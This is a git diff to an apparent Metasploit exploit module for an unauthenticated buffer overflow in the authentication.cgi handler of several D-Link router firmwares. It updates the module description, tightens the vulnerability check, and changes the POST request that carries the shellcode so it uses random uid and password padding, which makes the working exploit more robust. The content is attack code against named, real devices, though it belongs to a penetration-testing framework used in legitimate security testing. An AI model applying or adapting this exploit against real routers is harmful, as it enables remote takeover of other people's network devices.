diff --git a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb index 0299255176..d69f4b46c4 100644 --- a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb @@ -17,10 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'D-Link authentication.cgi Buffer Overflow', 'Description' => %q{ - This module exploits an anonymous remote code execution vulnerability on different D-Link routers. - This module has been tested successfully on D-Link DIR645A1_FW103B11. Different other devices like the - DIR865LA1_FW101b06 and DIR845LA1_FW100b20 are also vulnerable and they were tested within an emulated - environment. They are a little bit different in the first ROP gadget. + This module exploits an remote buffer overflow vulnerability on different D-Link routers. + The vulnerability exists in the handling of HTTP queries to the authentication.cgi with + long password values. The vulnerability can be exploitable without authentication. This + module has been tested successfully on D-Link firmware DIR645A1_FW103B11. Other firmwares + like the DIR865LA1_FW101b06 and DIR845LA1_FW100b20 are also vulnerable. }, 'Author' => [ @@ -63,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET' }) - if res && [200, 301, 302].include?(res.code) + if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /status.*uid/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError @@ -113,17 +114,16 @@ class Metasploit3 < Msf::Exploit::Remote def execute_command(cmd, opts) shellcode = prepare_shellcode(cmd) - + uid = rand_text_alpha(4) begin res = send_request_cgi({ 'method' => 'POST', - #'uri' => "/authentication_gdb.cgi", #for debugging on the router 'uri' => "/authentication.cgi", - 'cookie' => "uid=test", + 'cookie' => "uid=#{uid}", 'encode_params' => false, 'vars_post' => { - 'uid' => 'test', - 'password' => 'asd' << shellcode, + 'uid' => uid, + 'password' => rand_text_alpha(3) + shellcode, } }) return res